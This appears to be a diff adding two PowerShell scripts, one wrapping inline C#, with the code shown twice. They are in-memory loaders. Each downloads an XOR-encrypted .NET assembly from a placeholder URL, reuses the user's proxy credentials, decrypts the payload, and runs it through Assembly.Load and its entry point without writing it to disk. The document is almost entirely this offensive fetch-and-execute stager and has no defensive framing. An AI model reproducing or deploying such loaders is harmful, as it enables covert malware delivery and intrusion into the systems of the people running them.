Arno0x · October 12, 2023 23:19
diff --git a/loadAssembly_method1.ps1 b/loadAssembly_method1.ps1
 $Source = @"
 using System;
 using System.Net;
 using System.Reflection;
 namespace LoadAssembly {
 public static class LoadAssembly {
 public static void load() {
 WebClient webclient = new WebClient();
 IWebProxy defaultProxy = WebRequest.DefaultWebProxy;
 if (defaultProxy != null) {
    defaultProxy.Credentials = CredentialCache.DefaultCredentials;
    webclient.Proxy = defaultProxy;
 }
 byte[] b = webclient.DownloadData("https://xxxxx");
 string key = "xxxxxxxxx";
 for(int i = 0; i < b.Length; i++) { b[i] = (byte) (b[i] ^ key[i % key.Length]); }
 string[] parameters = new string[] {"acesstoken"};
 object[] args = new object[] {parameters};
 Assembly a = Assembly.Load(b);
 MethodInfo method = a.EntryPoint;
 object o = a.CreateInstance(method.Name);
 method.Invoke(o, args); }}}
 "@

 Add-Type -TypeDefinition $Source -Language CSharp
 [LoadAssembly.LoadAssembly]::load()
diff --git a/loadAssembly_method2.ps1 b/loadAssembly_method2.ps1
 $wc=New-Object System.Net.WebClient;$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0");$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials
 $k="xxxxxxx";$i=0;[byte[]]$b=([byte[]]($wc.DownloadData("https://xxxxx")))|%{$_-bxor$k[$i++%$k.length]}
 [System.Reflection.Assembly]::Load($b) | Out-Null
 $parameters=@("arg1", "arg2")
 [namespace.Class]::Main($parameters)
	$Source = @"
	using System;
	using System.Net;
	using System.Reflection;
	namespace LoadAssembly {
	public static class LoadAssembly {
	public static void load() {
	WebClient webclient = new WebClient();
	IWebProxy defaultProxy = WebRequest.DefaultWebProxy;
	if (defaultProxy != null) {
	defaultProxy.Credentials = CredentialCache.DefaultCredentials;
	webclient.Proxy = defaultProxy;
	}
	byte[] b = webclient.DownloadData("https://xxxxx");
	string key = "xxxxxxxxx";
	for(int i = 0; i < b.Length; i++) { b[i] = (byte) (b[i] ^ key[i % key.Length]); }
	string[] parameters = new string[] {"acesstoken"};
	object[] args = new object[] {parameters};
	Assembly a = Assembly.Load(b);
	MethodInfo method = a.EntryPoint;
	object o = a.CreateInstance(method.Name);
	method.Invoke(o, args); }}}
	"@

	Add-Type -TypeDefinition $Source -Language CSharp
	[LoadAssembly.LoadAssembly]::load()
	$wc=New-Object System.Net.WebClient;$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0");$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials
	$k="xxxxxxx";$i=0;[byte[]]$b=([byte[]]($wc.DownloadData("https://xxxxx")))\|%{$_-bxor$k[$i++%$k.length]}
	[System.Reflection.Assembly]::Load($b) \| Out-Null
	$parameters=@("arg1", "arg2")
	[namespace.Class]::Main($parameters)